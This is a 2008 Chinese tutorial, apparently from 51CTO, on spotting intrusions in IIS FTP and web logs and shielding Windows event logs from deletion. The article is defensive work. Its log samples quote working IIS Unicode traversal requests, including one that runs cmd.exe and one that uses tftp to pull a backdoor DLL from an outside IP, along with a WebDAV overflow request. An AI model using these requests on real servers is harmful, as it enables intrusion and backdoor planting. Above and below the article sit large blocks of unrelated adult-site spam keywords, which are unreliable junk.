国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

網(wǎng)管玩轉(zhuǎn)日志分析 抵制外部入侵
2008-07-11   51CTO

如今各式各樣的Windows漏洞層出不窮,五花八門的入侵工具更是令人眼花繚亂,稍微懂點(diǎn)網(wǎng)絡(luò)知識(shí)的人都可以利用各種入侵工具進(jìn)行入侵,這可給我們的網(wǎng)管帶來(lái)了很大的麻煩,雖然經(jīng)過(guò)精心配置的服務(wù)器可以抵御大部分入侵,但隨著不斷新出的漏洞,再高明的網(wǎng)管也不敢保證一臺(tái)務(wù)器長(zhǎng)時(shí)間不會(huì)被侵入,所以,安全配置服務(wù)器并不能永遠(yuǎn)阻止黑客入侵,而如何檢測(cè)入侵者行動(dòng)以保證服務(wù)器安全性就在這樣的情況下顯得非常重要。

日志文件作為微軟Windows系列操作系統(tǒng)中的一個(gè)特殊文件,在安全方面具有無(wú)可替代的價(jià)值。它每天為我們忠實(shí)地記錄下系統(tǒng)所發(fā)生一切事件,利用它可以使系統(tǒng)管理員快速對(duì)潛在的系統(tǒng)入侵作出記錄和預(yù)測(cè),但遺憾的是目前絕大多數(shù)的人都忽略了它的存在,反而是因?yàn)楹诳蛡児馀R才會(huì)使我們想起這個(gè)重要的系統(tǒng)日志文件,很有諷刺意味。

在這里我們就不去講什么日志文件的默認(rèn)位置、常見(jiàn)備份方法等基本技巧了,這樣的東西黑防以前講得很清楚了,大家可以翻看黑防以前的雜志學(xué)習(xí)這些東西,我們今天來(lái)看看如何分析常見(jiàn)的日志文件吧!

◆FTP日志分析

FTP日志和WWW日志在默認(rèn)情況下,每天生成一個(gè)日志文件,包含了該日的一切記錄,文件名通常為ex(年份)(月份)(日期)。例如ex040419,就是2004年4月19日產(chǎn)生的日志,用記事本可直接打開,普通的有入侵行為的日志一般是這樣的:

#Software: Microsoft Internet Information Services 5.0(微軟IIS5.0)

#Version: 1.0 (版本1.0)

#Date: 20040419 0315 (服務(wù)啟動(dòng)時(shí)間日期)

#Fields: time cip csmethod csuristem scstatus

0315 127.0.0.1 [1]USER administator 331(IP地址為127.0.0.1用戶名為administator試圖登錄)

0318 127.0.0.1 [1]PASS – 530(登錄失敗)

032:04 127.0.0.1 [1]USER nt 331(IP地址為127.0.0.1用戶名為nt的用戶試圖登錄)

032:06 127.0.0.1 [1]PASS – 530(登錄失?。?

032:09 127.0.0.1 [1]USER cyz 331(IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄)

0322 127.0.0.1 [1]PASS – 530(登錄失?。?

0322 127.0.0.1 [1]USER administrator 331(IP地址為127.0.0.1用戶名為administrator試圖登錄)

0324 127.0.0.1 [1]PASS – 230(登錄成功)

0321 127.0.0.1 [1]MKD nt 550(新建目錄失敗)

0325 127.0.0.1 [1]QUIT – 550(退出FTP程序)

從日志里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統(tǒng),換了四次用戶名和密碼才成功,管理員立即就可以得知這個(gè)IP至少有入侵企圖!而他的入侵時(shí)間、IP地址以及探測(cè)的用戶名都很清楚的記錄在日志上。如上例入侵者最終是用 Administrator用戶名進(jìn)入的,那么就要考慮此用戶名是不是密碼失竊?還是被別人利用?接下來(lái)就要想想系統(tǒng)出什么問(wèn)題了。

◆WWW日志分析

WWW服務(wù)同F(xiàn)TP服務(wù)一樣,產(chǎn)生的日志也是在%systemroot%sys tem32LogFilesW3SVC1目錄下,默認(rèn)是每天一個(gè)日志文件。這里需要特別說(shuō)明一下,因?yàn)閃eb的日志和其他日志不同,它的分析要細(xì)致得多,需要管理員有豐富的入侵、防護(hù)知識(shí),并且要足夠的細(xì)心,不然,很容易遺漏那種很簡(jiǎn)單的日志,而通常這樣的日志又是非常關(guān)鍵的。由于我們不可能一個(gè)一個(gè)分析,所以這里舉個(gè)簡(jiǎn)單例子:

#Software: Microsoft Internet Information Services 5.0

#Version: 1.0

#Date: 20040419 03:091

#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)

20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

通過(guò)分析第六行,可以看出2004年5月19日,IP地址為192.168.1.26的用戶通過(guò)訪問(wèn)IP地址為192.168.1.37機(jī)器的80端口,查看了一個(gè)頁(yè)面iisstart.asp,這位用戶的瀏覽器為compatible;+MSIE+5.0;+Windows+98+DigExt,有經(jīng)驗(yàn)的管理員就可通過(guò)安全日志、FTP日志和WWW日志來(lái)確定入侵者的IP地址以及入侵時(shí)間。

對(duì)現(xiàn)在非常常見(jiàn)的SQL注入式攻擊,通過(guò)對(duì)put、get的檢查,也可以大概判斷是那個(gè)頁(yè)面出了問(wèn)題,從而修補(bǔ)。

◆HTTPD事務(wù)日志的分析

Microsoft的IIS 5自公布到現(xiàn)在,被黑客利用的漏洞多不勝數(shù),像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我們分析日志的目的就是為了分析黑客入侵的行為,對(duì)于沒(méi)有打好補(bǔ)丁包的系統(tǒng)被黑客成功入侵的日志記錄分別對(duì)應(yīng)如下。為了給大家介紹一個(gè)比較醒目的介紹,專門配置了個(gè)“古老”的服務(wù)器,用舊漏洞給大家做個(gè)演示,很容易觸類旁通就懂其它了。

(1)unicode漏洞入侵日志記錄

這個(gè)是個(gè)非常經(jīng)典的漏洞了,要找這樣的服務(wù)器估計(jì)得去國(guó)外慢慢找了,但是因?yàn)樗娜罩臼亲罱?jīng)典的一個(gè),所以我們這里特別拿它來(lái)做個(gè)示范。

我們打開IIS5的Web服務(wù)的日志文件,日志文件默認(rèn)位置在%systemroot% system32LogFiles文件夾下,如圖1所示是一個(gè)典型的Unicode漏洞入侵行為的日志記錄,對(duì)于正常的Web訪問(wèn),是通過(guò)80端口用 GET命令獲取Web數(shù)據(jù),但通過(guò)非法的字符編碼可繞過(guò)字符驗(yàn)證而得到不應(yīng)該得到的信息。但補(bǔ)上相應(yīng)的補(bǔ)丁可堵上此漏洞。如圖一所示。

我們配合入侵來(lái)看下這樣的記錄:通過(guò)下面的編碼我們?cè)谌肭值臅r(shí)候可以查看目標(biāo)機(jī)的目錄文件:

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

則日志中會(huì)記錄下此訪問(wèn)行為:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir 200 -

看到了嗎?我們的日志中記錄地一清二楚,來(lái)自192.168.0.1的攻擊者查看我們的目錄。下面一行是向我們的機(jī)器傳送后門程序的日志記錄:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll

502 –

看到了吧?記錄非常詳細(xì)的,系統(tǒng)里面那個(gè)程序在響應(yīng)都記錄了下來(lái),這樣我們分析入侵行為就好辦了。

(2)WebDavx3遠(yuǎn)程溢出日志記錄

過(guò)去一段時(shí)間有名的Wevdavx3漏洞是應(yīng)用最廣泛的,如果系統(tǒng)遭受了此遠(yuǎn)程溢出的攻擊行為,則日志記錄如圖二所示。

2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK

/AAAAA……

這表示我們的Web服務(wù)受到了來(lái)自192.168.0.218的攻擊,并鎖定(即關(guān)閉)了WEB服務(wù),后面的一些亂碼字符是在溢出攻擊時(shí)使用的偏移位猜過(guò)程。

上面的幾種日雜都記錄了有入侵行為的IP地址,但此IP地址說(shuō)不定就是攻擊者使用了跳板,也就是說(shuō)此IP很可能是“肉雞”而不是攻擊者的IP,遇到這樣的情況,我們?cè)俨榭雌渌罩疚募€是有可能追查出攻擊者的位置的,但這個(gè)就完全靠管理員的經(jīng)驗(yàn)了。

◆日志文件的移位保護(hù)

通過(guò)上面的幾個(gè)方法,大家應(yīng)該可以檢測(cè)普通的系統(tǒng)攻擊了,但話說(shuō)回來(lái),如果上面的攻擊任何一個(gè)成功了,那現(xiàn)在我們都看不到日志了,早被入侵者清空了,所以,為了防患于未然,我們還是針對(duì)常見(jiàn)的刪除日志的方法,把日志挪挪吧。

好多文章介紹對(duì)事件日志移位能做到對(duì)系統(tǒng)系統(tǒng)很好的保護(hù),移位雖是一種保護(hù)方法,但只要在命令行輸入dir c:*.evt/s,一下就可查找到事件日志位置,再刪除可容易了,那怎么辦呢?其實(shí)日志移位要通過(guò)修改注冊(cè)表來(lái)完成,找到注冊(cè)表 HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog下面的Application、Security、System幾個(gè)子鍵,分別對(duì)應(yīng)“應(yīng)用程序日志”、“安全日志”、 “系統(tǒng)日志”。如何修改呢?下面我們具體來(lái)看看Application子鍵:File項(xiàng)就是“應(yīng)用程序日志”文件存放的位置,把此鍵值改為要存放日志文件的文件夾,我們?cè)侔?systemroot%system32configappevent.evt文件拷貝到此文件夾,再重啟機(jī)器就可以了。

在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性,如果不移位也無(wú)法對(duì)文件進(jìn)行安全設(shè)置操作,右擊移位后的“文件夾選擇屬性”,進(jìn)入“安全”選項(xiàng)卡,不選擇“允許將來(lái)自父系的可繼承權(quán)限傳播給該對(duì)象”,添加“System”組,分別給Everyone組“讀取”權(quán)限,System組選擇除“完全控制”和“修改”的權(quán)限。然后再將系統(tǒng)默認(rèn)的日志文件512KB大小改為你所想要的大小,如20MB。進(jìn)行了上面的設(shè)置后,直接通過(guò)Del C:*.Evt/s/q來(lái)刪除是刪不掉的,相對(duì)要安全很多了。

通過(guò)上面的幾個(gè)實(shí)際的例子,相信大家都應(yīng)該具備分析普通入侵日志的能力了,再結(jié)合一定的實(shí)際經(jīng)驗(yàn),通過(guò)日志來(lái)發(fā)現(xiàn)系統(tǒng)漏洞、追蹤入侵者就簡(jiǎn)單很多了。希望此文能拋磚引玉,給大家?guī)?lái)一些幫助。

熱詞搜索:

上一篇:掌握系統(tǒng)一舉一動(dòng) Linux日志管理
下一篇:配置Linux日志文件

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
久久久久成人黄色影片| 一区二区三区在线观看欧美| 日本韩国欧美三级| 99国产精品国产精品久久| 大桥未久av一区二区三区中文| 久久疯狂做爰流白浆xx| 精品一区二区三区免费观看| 激情久久五月天| 国产成人一区二区精品非洲| 91麻豆精东视频| 一本到高清视频免费精品| 91蜜桃网址入口| 在线观看网站黄不卡| 欧美日本韩国一区| 精品欧美乱码久久久久久| 久久亚洲影视婷婷| 国产精品久久久久久久久免费相片 | 日韩亚洲国产中文字幕欧美| 69久久99精品久久久久婷婷| 日韩手机在线导航| 国产日产欧美精品一区二区三区| 国产精品色在线| 亚洲欧美另类综合偷拍| 午夜欧美一区二区三区在线播放| 日韩av电影天堂| 国产精品系列在线观看| 91免费在线播放| 91精品在线观看入口| 久久久久久久久99精品| 亚洲精品高清在线| 久久99精品久久久久久国产越南| jvid福利写真一区二区三区| 欧美体内she精视频| 久久在线免费观看| 一区二区三区毛片| 国产精品一区二区不卡| 欧美性色综合网| 欧美国产欧美综合| 蜜臀av国产精品久久久久| eeuss鲁片一区二区三区在线看| 欧美日韩五月天| 欧美高清在线一区二区| 七七婷婷婷婷精品国产| 一本一道久久a久久精品综合蜜臀| 这里只有精品电影| 日韩毛片一二三区| 精品午夜一区二区三区在线观看| 99re6这里只有精品视频在线观看 99re8在线精品视频免费播放 | 欧美日韩mp4| 国产精品网曝门| 卡一卡二国产精品| 日本电影欧美片| 国产午夜亚洲精品理论片色戒| 亚洲电影欧美电影有声小说| 99久久国产免费看| 国产精品三级av在线播放| 久久se这里有精品| 欧美日本在线视频| 亚洲最快最全在线视频| 成人av在线播放网址| 国产亚洲婷婷免费| 国产揄拍国内精品对白| 综合色天天鬼久久鬼色| 国产精品99久久久久久久vr| 欧美一级二级在线观看| 午夜国产精品影院在线观看| 欧美天堂亚洲电影院在线播放| 日韩美女视频一区| 一本大道av一区二区在线播放| 久久久久久久久99精品| 国内精品嫩模私拍在线| 2017欧美狠狠色| 国产尤物一区二区在线| 精品国产百合女同互慰| 精久久久久久久久久久| 精品免费一区二区三区| 韩国一区二区三区| 国产欧美日韩麻豆91| 成年人国产精品| 日韩美女啊v在线免费观看| av电影一区二区| 亚洲欧美色综合| 在线视频你懂得一区二区三区| 一区二区三区加勒比av| 欧美在线一区二区| 五月婷婷另类国产| 日韩午夜小视频| 国产真实乱子伦精品视频| 日本一区二区三级电影在线观看| 成人av网站在线| 亚洲国产日韩a在线播放性色| 欧美日韩免费观看一区二区三区| 亚洲动漫第一页| 日韩亚洲欧美在线| 国产suv精品一区二区883| 亚洲视频在线观看三级| 欧美日韩一区二区在线视频| 日韩国产欧美在线播放| 精品电影一区二区| av不卡免费在线观看| 午夜精品久久久久影视| 精品国产髙清在线看国产毛片| 国产91精品久久久久久久网曝门| 亚洲欧美一区二区在线观看| 欧美亚洲尤物久久| 精一区二区三区| 亚洲黄色性网站| 2020国产精品自拍| 欧美视频一区二区三区四区| 国产美女精品人人做人人爽| 亚洲精品一二三| 亚洲精品一区在线观看| 一本色道亚洲精品aⅴ| 六月丁香综合在线视频| 亚洲男帅同性gay1069| 日韩欧美国产一区二区在线播放| 波波电影院一区二区三区| 美女视频黄a大片欧美| 国产精品大尺度| 26uuu亚洲| 欧美美女网站色| 99re免费视频精品全部| 国产一区二区三区在线观看精品 | 精品视频色一区| 国产精品亚洲专一区二区三区| 亚洲影视在线播放| 国产人久久人人人人爽| 欧美成人bangbros| 国产欧美一区二区精品婷婷| 欧美日韩免费视频| 色综合激情五月| 波波电影院一区二区三区| 国产一区二区三区四区在线观看| 天天色天天操综合| 亚洲午夜在线观看视频在线| 亚洲色图丝袜美腿| 国产精品第一页第二页第三页| 久久久久9999亚洲精品| 欧美精品一区二区在线观看| 91精品国产综合久久久久久漫画 | 成人黄色软件下载| 国产成人免费在线视频| 久久精品国产一区二区三区免费看| 一区二区三区免费看视频| 国产精品久久久久久久久搜平片| 久久久久综合网| www国产成人免费观看视频 深夜成人网| 欧美日韩国产首页| 欧美精品乱码久久久久久按摩| 欧美日韩一区不卡| 欧美色男人天堂| 在线不卡a资源高清| 欧美精品aⅴ在线视频| 欧美日韩国产欧美日美国产精品| 欧洲国内综合视频| 欧美日韩一二三| 91精品国产综合久久福利软件| 欧美在线免费播放| 91麻豆精品国产综合久久久久久 | 成人国产免费视频| 99国产欧美另类久久久精品| 91尤物视频在线观看| 一本大道久久a久久综合| 欧美日韩一区二区三区视频| 91精品国产美女浴室洗澡无遮挡| 91精品国产综合久久久久久久久久 | 蜜臀久久99精品久久久久宅男| 视频一区二区欧美| 男人的天堂久久精品| 精品影视av免费| 成人深夜福利app| 一本到一区二区三区| 欧美日韩国产区一| 欧美sm美女调教| 国产精品久久久久久久久久免费看| 国产精品久久久久久久第一福利| 综合欧美一区二区三区| 亚洲.国产.中文慕字在线| 久久精品噜噜噜成人88aⅴ| 波多野结衣中文字幕一区 | 日韩高清一级片| 激情av综合网| 日本福利一区二区| 日韩美女主播在线视频一区二区三区| 久久久久久久综合| 亚洲国产成人高清精品| 国产在线看一区| 欧美中文字幕亚洲一区二区va在线| 日韩一区二区免费视频| 自拍偷拍亚洲欧美日韩| 免费在线观看一区二区三区| av一区二区不卡| 一区二区成人在线| 激情久久久久久久久久久久久久久久| av高清久久久| 精品成人a区在线观看| 亚洲最新视频在线播放| 成人午夜免费电影| 日韩欧美一级片| 一区二区三区日韩欧美精品|